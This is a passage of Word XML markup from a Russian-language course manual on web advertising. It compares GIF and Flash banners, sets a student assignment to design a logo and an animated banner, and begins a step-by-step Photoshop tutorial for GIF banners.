        <w:t xml:space="preserve">Кадры в gif-формате могут сменяться с разной частотой: от доли секунды до десятков минут, что можно выгодно использовать для заострения внимания на каком-то определенном моменте (например – рекламном тексте), продляя время его показа и сокращая интервал </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>неважных</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> кадров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Может развернуть в баннере мини-сценарий с множеством кадров и элементов. По статистике отклик флеш-баннеров на несколько порядков выше, чем баннеров всех других форматов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Качество изображения идеально, не имеет </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>размытостей</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и лишних пикселей, для внедрения различных элементов можно использовать картинки разных форматов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Движение объектов флеш-анимации плавно и максимально приближено к естественному.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разные части баннера могут вести на разные страницы сайта, что очень удобно, например, для астрологических сайтов с рекламой гороскопов по знакам зодиака.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выглядят flash-баннеры как правило весьма презентабельно, так как вследствие сложности, их разработка осуществляется квалифицированными специалистами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кроме технических и визуальных отличий gif и flash форматов, существуют ещ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и такие важнейшие сравнительные моменты, без которых знание о баннерах будет неполным:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Самая главная особенность gif-баннеров в том, что их можно сделать самостоятельно и для этого существует большое количество программного обеспечения (от профессионального до пользовательского) в отличие от флеш-баннеров, изготовление которых требует специальных знаний в области программирования и навыков в работе с </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MacromediaFlash</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В плане веса конечной анимации flash выигрывает перед gif в соотношении к количеству кадров, так как каждый элемент сохраняется в программе один раз и далее меняются только его свойства, без копирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если баннер предусматривает какое-то особе оформление текста (трехмерность, тень и другие), то возможности флеш в данном вопросе весьма скудны. Тогда как AdobePhotoshop, в котором профессионально рисуются составляющие гиф-анимаци в этом отношении непревзойденный лидер, предоставляющий безграничные возможности оформления текста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы качественно выполнить flash-баннер необходимо хотя бы немного уметь рисовать, так как для связки кадров в большинстве случае требуется прорисовка составляющих </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>от руки</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, тогда как gif-баннер возможно полностью выполнить из готовых частей картинок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">С точки зрения поисковой оптимизации flash-технологии пока проигрывают, а именно: флеш элементы сайтов и баннеры не индексируются большинством поисковых систем, что в некоторых баннерных сетях служит основанием для непринятия к показу этого формата. У гиф-баннеров такой проблемы нет, кроме того при их вставке на страницу есть возможность включения в специальный тег alt </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>альтернативного текста</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, который позволяет дополнительно индексировать сайт не только по содержимому, но и по баннеру.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Флеш позволяет создавать баннеры, уникальные по внешнему виду, которые не так просто </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>украсть</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Если понравившийся gif-баннер можно сохранить как обычный рисунок двумя щелчками мыши, то для сохранения флеш потребуются специальные программы. Но тут есть и обратная сторона: флеш сложнее украсть, но проще изменить без потери качества и выдать за свой. Gif переделать гораздо труднее, так как не имея исходника, все кадры, даже для модификации одной единственной буквы, придется перерисовывать вручную.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, истина о том, что </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вс</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет свои плюсы и минусы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> актуальна и для мира интернет-баннеров: конечный выбор того или иного формата нужно делать исходя из целей и средств в каждом конкретном случае.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="002E7230" w:rsidP="002E7230">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Определить</w:t>
      </w:r>
      <w:r w:rsidR="00D2081A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> компанию, какую вы будете рекламировать (продолжение)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков создания рекламной продукции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, программное обеспечение для работы с графикой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Работа содержит большую творческую составляющую, в связи с этим решено не ограничивать студента выбором темы. Преподаватель удостоверяется, что работа выполнена самим студентом и оценивает ее качество.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Письменный отчет содержащий эскизы составляющих электронного баннера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Необходимо определиться какую компанию вы будете рекламировать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Для выбранной компании необходимо разработать эскиз логотипа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Нужно придумать идею рекламного анимированного баннера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00D2081A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анимированные Gif файлы были поводом для многих шуток в дизайнерских обществах. Это потому, что анимационные картинки известны тем, что немного навязчивы и загромождают интернет-странички. Однако при правильном использовании, анимация может привлечь внимание к себе и заставить забыть о другом содержимом страницы. Сегодня мы покажем, как использовать Photoshop CS5 для создания анимированных GIF баннеров. Давайте начнем!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Создайте новый документ размером 250 х 250 пикселей и установите разрешение (resolution) до 70 пикселей. Цвет фона для баннера будет такой # </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f2f2f2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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2096"/>
        <w:gridCol w:w="1429"/>
        <w:gridCol w:w="3045"/>
      </w:tblGrid>
      <w:tr w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidTr="00E57474">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4994" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2544150" cy="1612941"/>
                  <wp:effectExtent l="19050" t="0" r="8550" b="0"/>
                  <wp:docPr id="61" name="Рисунок 761" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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http://ok-t.ru/studopedia/baza14/71156389034.files/image019.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId465" cstate="print">
                            <a:lum/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2547337" cy="1614961"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4860" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1619972" cy="1677600"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="62" name="Рисунок 762" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image020.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId466" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1622228" cy="1679937"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidTr="00E57474">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4994" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidRDefault="00E57474" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Шаг 2.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Поместите логотип в верхней центральной части баннера</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidRDefault="00E57474" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1492950" cy="1420596"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="45" name="Рисунок 763" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image021.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId467" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1494177" cy="1421764"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4860" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidRDefault="00E57474" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Шаг 3.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Напишите слоган под логотипом.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidRDefault="00E57474" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1625521" cy="1562400"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="68" name="Рисунок 764" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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http://ok-t.ru/studopedia/baza14/71156389034.files/image022.png"/>
                          <pic:cNvPicPr>
